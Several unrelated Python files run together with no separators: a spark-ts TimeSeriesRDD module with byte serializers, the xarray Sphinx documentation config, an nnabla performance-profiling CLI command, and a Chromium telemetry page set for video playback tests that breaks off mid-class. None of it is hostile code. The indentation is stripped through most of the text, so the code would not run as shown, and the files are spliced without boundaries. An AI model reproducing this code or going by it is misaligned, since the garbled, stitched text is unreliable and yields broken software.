from py4j.java_gateway import java_import
from pyspark import RDD
from pyspark.serializers import FramedSerializer, SpecialLengths, write_int, read_int
from pyspark.sql import DataFrame
from utils import datetime_to_millis
from datetimeindex import DateTimeIndex
import struct
import numpy as np
import pandas as pd
from io import BytesIO
class TimeSeriesRDD(RDD):
"""
A lazy distributed collection of univariate series with a conformed time dimension. Lazy in the
sense that it is an RDD: it encapsulates all the information needed to generate its elements,
but doesn't materialize them upon instantiation. Distributed in the sense that different
univariate series within the collection can be stored and processed on different nodes. Within
each univariate series, observations are not distributed. The time dimension is conformed in the
sense that a single DateTimeIndex applies to all the univariate series. Each univariate series
within the RDD has a String key to identify it.
"""
def __init__(self, dt_index, rdd, jtsrdd = None, sc = None):
        if jtsrdd is None:
# Construct from a Python RDD object and a Python DateTimeIndex
jvm = rdd.ctx._jvm
jrdd = rdd._reserialize(_TimeSeriesSerializer())._jrdd.map( \
jvm.com.cloudera.sparkts.BytesToKeyAndSeries())
self._jtsrdd = jvm.com.cloudera.sparkts.TimeSeriesRDD( \
dt_index._jdt_index, jrdd.rdd())
RDD.__init__(self, rdd._jrdd, rdd.ctx)
else:
# Construct from a py4j.JavaObject pointing to a TimeSeriesRDD and a Python SparkContext
jvm = sc._jvm
jrdd = jvm.org.apache.spark.api.java.JavaRDD(jtsrdd, None).map( \
jvm.com.cloudera.sparkts.KeyAndSeriesToBytes())
RDD.__init__(self, jrdd, sc, _TimeSeriesSerializer())
self._jtsrdd = jtsrdd
def __getitem__(self, val):
"""Returns a TimeSeriesRDD representing a subslice of this TimeSeriesRDD, containing only
values for a sub-range of the time it covers.
"""
start = datetime_to_millis(val.start)
stop = datetime_to_millis(val.stop)
return TimeSeriesRDD(None, None, self._jtsrdd.slice(start, stop), self.ctx)
def differences(self, n):
"""Returns a TimeSeriesRDD where each time series is differenced with the given order.
The new RDD will be missing the first n date-times.
Parameters:
n : int
The order of differencing to perform.
"""
return TimeSeriesRDD(None, None, self._jtsrdd.differences(n), self.ctx)
def fill(self, method):
"""Returns a TimeSeriesRDD with missing values imputed using the given method.
Parameters:
method : string
"nearest" fills in NaNs with the closest non-NaN value, using the closest previous value
in the case of a tie. "linear" does a linear interpolation from the closest filled-in
values. "next" uses the closest value that is in the future of the missing value.
"previous" uses the closest value from the past of the missing value. "spline"
interpolates using a cubic spline.
"""
return TimeSeriesRDD(None, None, self._jtsrdd.fill(method), self.ctx)
def map_series(self, fn, dt_index = None):
"""Returns a TimeSeriesRDD, with a transformation applied to all the series in this RDD.
Either the series produced by the given function should conform to this TimeSeriesRDD's
index, or a new DateTimeIndex should be given that they conform to.
Parameters:
fn : function
A function that maps arrays of floats to arrays of floats.
dt_index : DateTimeIndex
            A DateTimeIndex for the produced TimeSeriesRDD.
"""
        if dt_index is None:
dt_index = self.index()
return TimeSeriesRDD(dt_index, self.map(fn))
def to_instants(self):
"""Returns an RDD of instants, each a horizontal slice of this TimeSeriesRDD at a time.
This essentially transposes the TimeSeriesRDD, producing an RDD of tuples of datetime and
a numpy array containing all the observations that occurred at that time.
"""
jrdd = self._jtsrdd.toInstants(-1).toJavaRDD().map( \
self.ctx._jvm.com.cloudera.sparkts.InstantToBytes())
return RDD(jrdd, self.ctx, _InstantDeserializer())
def index(self):
"""Returns the index describing the times referred to by the elements of this TimeSeriesRDD
"""
jindex = self._jtsrdd.index()
return DateTimeIndex(jindex)
def to_observations_dataframe(self, sql_ctx, ts_col='timestamp', key_col='key', val_col='value'):
"""Returns a DataFrame of observations, each containing a timestamp, a key, and a value.
Parameters:
sql_ctx : SQLContext
ts_col : string
The name for the timestamp column.
key_col : string
The name for the key column.
val_col : string
The name for the value column.
"""
ssql_ctx = sql_ctx._ssql_ctx
jdf = self._jtsrdd.toObservationsDataFrame(ssql_ctx, ts_col, key_col, val_col)
return DataFrame(jdf, sql_ctx)
def remove_instants_with_nans(self):
"""Returns a TimeSeriesRDD with instants containing NaNs cut out.
The resulting TimeSeriesRDD has a slimmed down DateTimeIndex, missing all the instants
for which any series in the RDD contained a NaN.
"""
return TimeSeriesRDD(None, None, self._jtsrdd.removeInstantsWithNaNs(), self.ctx)
def filter(self, predicate):
return TimeSeriesRDD(self.index(), super(TimeSeriesRDD, self).filter(predicate))
def find_series(self, key):
"""Finds a series in the TimeSeriesRDD by its key.
Parameters:
key : string
The key of the series to find.
"""
# TODO: this could be more efficient if we pushed it down into Java
        return self.filter(lambda x: x[0] == key).first()[1]
def time_series_rdd_from_observations(dt_index, df, ts_col, key_col, val_col):
"""Instantiates a TimeSeriesRDD from a DataFrame of observations.
An observation is a row containing a timestamp, a string key, and float value.
Parameters:
dt_index : DateTimeIndex
The index of the RDD to create. Observations not contained in this index will be ignored.
df : DataFrame
ts_col : string
The name of the column in the DataFrame containing the timestamps.
key_col : string
The name of the column in the DataFrame containing the keys.
val_col : string
The name of the column in the DataFrame containing the values.
"""
jvm = df._sc._jvm
jtsrdd = jvm.com.cloudera.sparkts.TimeSeriesRDD.timeSeriesRDDFromObservations( \
dt_index._jdt_index, df._jdf, ts_col, key_col, val_col)
return TimeSeriesRDD(None, None, jtsrdd, df._sc)
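# --- Hedged usage sketch (not part of the original module) ---
# Ties the observations path together, assuming an existing SQLContext
# `sql_ctx`, a DateTimeIndex `dt_index`, and a DataFrame `obs_df` with
# 'timestamp', 'key', and 'value' columns; these names are illustrative.
def _example_from_observations(sql_ctx, dt_index, obs_df):
    tsrdd = time_series_rdd_from_observations(
        dt_index, obs_df, 'timestamp', 'key', 'value')
    filled = tsrdd.fill('linear')  # impute missing values by linear interpolation
    return filled.to_observations_dataframe(sql_ctx)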
class _TimeSeriesSerializer(FramedSerializer):
"""Serializes (key, vector) pairs to and from bytes. Must be compatible with the Scala
implementation in com.cloudera.sparkts.{BytesToKeyAndSeries, KeyAndSeriesToBytes}
"""
def dumps(self, obj):
stream = BytesIO()
(key, vector) = obj
key_bytes = key.encode('utf-8')
write_int(len(key_bytes), stream)
stream.write(key_bytes)
write_int(len(vector), stream)
# TODO: maybe some optimized way to write this all at once?
for value in vector:
stream.write(struct.pack('!d', value))
stream.seek(0)
return stream.read()
def loads(self, obj):
stream = BytesIO(obj)
key_length = read_int(stream)
key = stream.read(key_length).decode('utf-8')
return (key, _read_vec(stream))
def __repr__(self):
return '_TimeSeriesSerializer'
class _InstantDeserializer(FramedSerializer):
"""Serializes (timestamp, vector) pairs to an from bytes. Must be compatible with the Scala
implementation in com.cloudera.sparkts.InstantToBytes
"""
def loads(self, obj):
stream = BytesIO(obj)
timestamp_ms = struct.unpack('!q', stream.read(8))[0]
return (pd.Timestamp(timestamp_ms * 1000000), _read_vec(stream))
def __repr__(self):
return "_InstantDeserializer"
def _read_vec(stream):
vector_length = read_int(stream)
vector = np.empty(vector_length)
# TODO: maybe some optimized way to read this all at once?
for i in xrange(vector_length):
vector[i] = struct.unpack('!d', stream.read(8))[0]
return vector
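# --- Illustrative sketch (not part of the original module) ---
# The (key, vector) wire format above is a framed UTF-8 key (int32 length
# prefix) followed by an int32 element count and big-endian float64 values.
# This minimal round-trip exercises dumps()/loads() locally, without Spark.
def _example_serializer_round_trip():
    ser = _TimeSeriesSerializer()
    key, vec = 'series-a', np.array([1.0, 2.5, 3.75])
    payload = ser.dumps((key, vec))
    out_key, out_vec = ser.loads(payload)
    assert out_key == key and list(out_vec) == list(vec)
    return out_key, out_vec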
# -*- coding: utf-8 -*-
#
# xarray documentation build configuration file, created by
# sphinx-quickstart on Thu Feb 6 18:57:54 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import sys
import os
import datetime
import importlib
print("python exec:", sys.executable)
print("sys.path:", sys.path)
for name in ('numpy scipy pandas matplotlib dask IPython seaborn '
'cartopy netCDF4 rasterio').split():
try:
module = importlib.import_module(name)
if name == 'matplotlib':
module.use('Agg')
        fname = os.path.dirname(module.__file__)
print("%s: %s, %s" % (name, module.__version__, fname))
except ImportError:
print("no %s" % name)
import xarray
print("xarray: %s, %s" % (xarray.__version__, xarray.__file__))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.intersphinx',
'sphinx.ext.extlinks',
'sphinx.ext.mathjax',
'numpydoc',
'IPython.sphinxext.ipython_directive',
'IPython.sphinxext.ipython_console_highlighting',
'sphinx_gallery.gen_gallery',
]
extlinks = {'issue': ('https://github.com/pydata/xarray/issues/%s', 'GH'),
'pull': ('https://github.com/pydata/xarray/pull/%s', 'PR'),
}
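# Illustrative note (not part of the original conf.py): with the extlinks
# mapping above, ``:issue:`1234``` in a .rst file renders as "GH1234" linked to
# https://github.com/pydata/xarray/issues/1234, and ``:pull:`5678``` renders as
# "PR5678" linked to the corresponding pull request URL.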
sphinx_gallery_conf = {'examples_dirs': 'gallery',
'gallery_dirs': 'auto_gallery',
'backreferences_dir': False
}
autosummary_generate = True
numpydoc_class_members_toctree = True
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'xarray'
copyright = '2014-%s, xarray Developers' % datetime.datetime.now().year
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = xarray.version.short_version
# The full version, including alpha/beta/rc tags.
release = xarray.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%Y-%m-%d'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# on_rtd is whether we are building on readthedocs.org; this line of code was
# grabbed from docs.readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# otherwise, readthedocs.org uses their theme by default, so no need to specify it
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Sometimes the savefig directory doesn't exist and needs to be created
# https://github.com/ipython/ipython/issues/8733
# becomes obsolete when we can pin ipython>=5.2; see doc/environment.yml
ipython_savefig_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'_build','html','_static')
if not os.path.exists(ipython_savefig_dir):
os.makedirs(ipython_savefig_dir)
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = today_fmt
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'xarraydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'xarray.tex', 'xarray Documentation',
'xarray Developers', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'xarray', 'xarray Documentation',
['xarray Developers'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'xarray', 'xarray Documentation',
'xarray Developers', 'xarray', 'N-D labeled arrays and datasets in Python.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/3/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'iris': ('http://scitools.org.uk/iris/docs/latest/', None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'numba': ('https://numba.pydata.org/numba-doc/latest/', None),
}
# Copyright 2017,2018,2019,2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import time
from collections import OrderedDict
from functools import partial
import nnabla.utils.callback as callback
import nnabla.utils.load as load
import numpy as np
from contextlib2 import ExitStack # Backport from python3
from nnabla.ext_utils import import_extension_module
from nnabla.logger import logger
from nnabla.utils.cli.utility import let_data_to_variable
from nnabla.utils.progress import configure_progress, progress
def profile(config, name, func, result_dict, synchronize):
# Warm-up
func()
    synchronize()
# Profile
start_0 = time.time()
result = 0
count = 0
while time.time() < start_0 + 1.0 or count < 100:
start = time.time()
func()
        synchronize()
stop = time.time()
result += stop - start
count += 1
t = result * 1000 / count
logger.log(99, '%s %f(ms)' % (name, t))
result_dict[name] = t
return result_dict
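# --- Hedged usage sketch (not part of the original module) ---
# profile() warms the callable up once, then times repeated calls for at least
# one second (and at least 100 iterations) and records the mean per-call time
# in milliseconds. A minimal, hypothetical invocation with no-op callables:
def _example_profile_usage():
    results = OrderedDict()
    profile(None, 'noop', lambda: None, results, lambda: None)
    return results  # e.g. OrderedDict([('noop', <milliseconds per call>)])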
def add_result(title, result_dict, result_array):
result_row = [line[0] for line in result_array]
col_index = len(result_array[0])
for k in result_dict.keys():
if k not in result_row:
result_row.append(k)
row = ['' for _ in range(len(result_array[0]))]
row[0] = k
result_array.append(row)
result_array[0].append(title)
for k, v in result_dict.items():
row_index = result_row.index(k)
result_array[row_index].append('%f' % v)
return result_array
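# --- Illustrative sketch (not part of the original module) ---
# add_result() grows a row-oriented table whose first row holds column titles
# and whose remaining rows start with a metric name. A small, hypothetical
# example of two successive calls:
def _example_add_result():
    table = [['time in ms']]
    table = add_result('run 0', OrderedDict([('forward_all', 1.2)]), table)
    table = add_result('run 1', OrderedDict([('forward_all', 1.1),
                                             ('backward_all', 2.3)]), table)
    # table is now:
    # [['time in ms', 'run 0', 'run 1'],
    #  ['forward_all', '1.200000', '1.100000'],
    #  ['backward_all', '', '2.300000']]
    return table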
def profile_optimizer(config, result_array, synchronize):
# Profile Training
for opt in config.optimizers.values():
o = opt.optimizer
result_name = "optimizer '%s' with network '%s'" % (
o.name, o.network.name)
result_dict = OrderedDict()
logger.log(99, 'Profiling ' + result_name + ' ...')
# Clear weight
for name, p in o.parameters.items():
if name[-2:] in ('/W', '/b'):
p.data.zero()
# Load dataset
def load_dataset():
loaded_data = {}
data = OrderedDict()
for di in opt.data_iterators:
if di not in loaded_data:
loaded_data[di] = di.next()
data.update(zip(di.variables, loaded_data[di]))
return data
profile(config, 'load_dataset', load_dataset, result_dict, synchronize)
# Let data
data = load_dataset()
for v, d in o.dataset_assign.items():
def let_data():
if d not in data:
raise ValueError(
'Data "' + d + '" is not found in dataset.')
let_data_to_variable(v.variable_instance, data=data[d],
data_name=d, variable_name=v.name)
profile(config, 'let_data (%s to %s)' %
(d, v.name), let_data, result_dict, synchronize)
# Generate data
for v, generator in o.generator_assign.items():
def generate_data():
let_data_to_variable(v.variable_instance,
data=generator(
v.variable_instance.d.shape),
variable_name=v.name)
profile(config, 'generate_data (%s)' %
v.name, generate_data, result_dict, synchronize)
'''
# Setup (detail)
for func in o.forward_sequence:
def setup():
o.network.setup_function(func)
profile(config, 'setup_function (%s : %s)' % (
func.name, func.function_instance.name), setup, result_dict, synchronize)
'''
# Warm-up
# o.network.forward(o.forward_sequence)
# o.network.prepare_backward(o.backward_sequence)
# o.network.backward(o.backward_sequence)
o.forward_sequence = []
o.backward_sequence = []
o.target.forward(clear_no_need_grad=True,
function_pre_hook=lambda f: o.forward_sequence.append(f))
o.target.backward(
clear_buffer=True, function_pre_hook=lambda f: o.backward_sequence.append(f))
# Forward (detail)
for func in o.forward_sequence:
if func.name == 'Sink':
continue
profile(config, 'forward_function (%s : %s)' % (func.name, func.name),
partial(func.forward, inputs=func.inputs,
outputs=func.outputs),
result_dict, synchronize)
# Backward (detail)
def empty_func():
            pass  # keep this for backward compatibility
profile(config, 'prepare_backward',
empty_func, result_dict, synchronize)
for func in o.backward_sequence:
if func.name == 'Sink':
continue
profile(config, 'backward_function (%s : %s)' % (func.name, func.name),
partial(func.backward, inputs=func.inputs,
outputs=func.outputs),
result_dict, synchronize)
# Forward (all)
def forward_all():
o.target.forward(clear_no_need_grad=True)
profile(config, 'forward_all', forward_all, result_dict, synchronize)
# Backward (all)
def backward_all():
o.target.backward(clear_buffer=True)
profile(config, 'backward_all', backward_all, result_dict, synchronize)
        # Backward (without param zero_grad)
def backward_all_wo_zero_grad():
for name, p in o.parameters.items():
if name[-2:] in ('/W', '/b'):
p.grad.zero()
o.target.backward(clear_buffer=True)
profile(config, 'backward_all(wo param zero_grad)',
backward_all_wo_zero_grad, result_dict, synchronize)
# Update (weight decay)
if o.weight_decay > 0:
def weight_decay():
o.solver.weight_decay(o.weight_decay)
profile(config, 'weight_decay (%s)' %
o.solver.name, weight_decay, result_dict, synchronize)
# Update
def update():
o.solver.update()
profile(config, 'update (%s)' %
o.solver.name, update, result_dict, synchronize)
# Monitor loss
def monitor_loss():
for l in o.loss_variables:
np.mean(l.variable_instance.d)
profile(config, 'monitor_loss', monitor_loss, result_dict, synchronize)
result_array = add_result(result_name, result_dict, result_array)
return result_array
def profile_command(args):
callback.update_status(args)
configure_progress(os.path.join(args.outdir, 'progress.txt'))
class TrainConfig:
pass
config = TrainConfig()
info = load.load(args.config)
config.global_config = info.global_config
config.training_config = info.training_config
class OptConfig:
pass
config.optimizers = OrderedDict()
for name, opt in info.optimizers.items():
o = OptConfig()
o.optimizer = opt
o.data_iterators = []
config.optimizers[name] = o
class MonConfig:
pass
config.monitors = OrderedDict()
for name, mon in info.monitors.items():
m = MonConfig()
m.monitor = mon
m.data_iterators = []
config.monitors[name] = m
ext_module = import_extension_module(
config.global_config.default_context.backend[0].split(':')[0])
def synchronize(): return ext_module.synchronize(
device_id=config.global_config.default_context.device_id)
result_array = [['time in ms']]
callback.update_status('processing', True)
# Profile Optimizer
with ExitStack() as stack:
# Create data_iterator instance only once for each dataset in optimizers
optimizer_data_iterators = {}
for name, o in config.optimizers.items():
for di in o.optimizer.data_iterators.values():
if di not in optimizer_data_iterators:
di_instance = stack.enter_context(di())
optimizer_data_iterators[di] = di_instance
else:
di_instance = optimizer_data_iterators[di]
o.data_iterators.append(di_instance)
result_array = profile_optimizer(config, result_array, synchronize)
# Write profiling result
import csv
with open(args.outdir + os.sep + 'profile.csv', 'w') as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerows(result_array)
logger.log(99, 'Profile Completed.')
progress(None)
callback.update_status('finished')
return True
def add_profile_command(subparsers):
# Profile
subparser = subparsers.add_parser(
'profile', help='Profiling performance with NNP.')
subparser.add_argument(
'-c', '--config', help='path to nntxt', required=True)
subparser.add_argument(
'-o', '--outdir', help='output directory', required=True)
subparser.set_defaults(func=profile_command)
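# --- Hedged usage sketch (not part of the original module) ---
# How add_profile_command is typically attached to an argparse-based CLI; the
# parser construction below is illustrative and not nnabla's actual entry point.
def _example_cli_wiring(argv):
    import argparse
    parser = argparse.ArgumentParser(description='profiling CLI sketch')
    subparsers = parser.add_subparsers()
    add_profile_command(subparsers)
    args = parser.parse_args(argv)  # e.g. ['profile', '-c', 'net.nntxt', '-o', 'out']
    return args.func(args)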
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from telemetry.page import page as page_module
from telemetry import story
class ToughVideoCasesPage(page_module.Page):
def __init__(self, url, page_set, labels=None):
super(ToughVideoCasesPage, self).__init__(
url=url, page_set=page_set, labels=labels)
def LoopMixedAudio(self, action_runner):
action_runner.PlayMedia(selector='#background_audio',
playing_event_timeout_in_seconds=60)
action_runner.LoopMedia(loop_count=50, selector='#mixed_audio')
def LoopSingleAudio(self, action_runner):
action_runner.LoopMedia(loop_count=50, selector='#single_audio')
def PlayAction(self, action_runner):
action_runner.PlayMedia(playing_event_timeout_in_seconds=60,
ended_event_timeout_in_seconds=60)
def SeekBeforeAndAfterPlayhead(self, action_runner,
action_timeout_in_seconds=60):
timeout = action_timeout_in_seconds
# Because an ended timeout is passed, this won't return until the media has
# played through.
action_runner.PlayMedia(playing_event_timeout_in_seconds=timeout,
ended_event_timeout_in_seconds=timeout)
# Wait 1 second for no reason in particular.
action_runner.Wait(1)
# Seek to before the play-head location.
action_runner.SeekMedia(seconds=0.5, timeout_in_seconds=timeout,
label='seek_warm')
# Seek to after the play-head location.
action_runner.SeekMedia(seconds=9, timeout_in_seconds=timeout,
label='seek_cold')
class Page1(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page1, self).__init__(
url='file://tough_video_cases/video.html?src=crowd.wav&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page2(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page2, self).__init__(
url='file://tough_video_cases/video.html?src=crowd.ogg&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page3(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page3, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.ogv',
page_set=page_set)
self.add_browser_metrics = True
self.is_50fps = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page4(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page4, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.webm',
page_set=page_set, labels=['is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page5(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page5, self).__init__(
url='file://tough_video_cases/video.html?src=crowd2160.ogv',
page_set=page_set, labels=['is_4k', 'is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page6(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page6, self).__init__(
url='file://tough_video_cases/video.html?src=crowd2160.webm',
page_set=page_set, labels=['is_4k', 'is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page7(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page7, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogg&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page8(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page8, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.wav&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page9(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page9, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogv',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page10(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page10, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.webm',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page11(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page11, self).__init__(
url='file://tough_video_cases/video.html?src=crowd1080.mp4',
page_set=page_set, labels=['is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page12(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page12, self).__init__(
url='file://tough_video_cases/video.html?src=crowd2160.mp4',
page_set=page_set, labels=['is_4k', 'is_50fps'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page13(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page13, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp3&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page14(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page14, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.mp4',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page15(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page15, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.m4a&type=audio',
page_set=page_set)
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page16(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page16, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.webm',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page17(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page17, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.mp4',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page18(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page18, self).__init__(
url='file://tough_video_cases/video.html?src=garden2_10s.ogv',
page_set=page_set, labels=['is_4k'])
self.add_browser_metrics = True
def RunPageInteractions(self, action_runner):
self.PlayAction(action_runner)
class Page19(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page19, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogg&type=audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page20(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page20, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.wav&type=audio',
page_set=page_set)
self.skip_basic_metrics = True
def RunPageInteractions(self, action_runner):
self.SeekBeforeAndAfterPlayhead(action_runner)
class Page21(ToughVideoCasesPage):
def __init__(self, page_set):
super(Page21, self).__init__(
url='file://tough_video_cases/video.html?src=tulip2.ogv',
page_set=page_set)
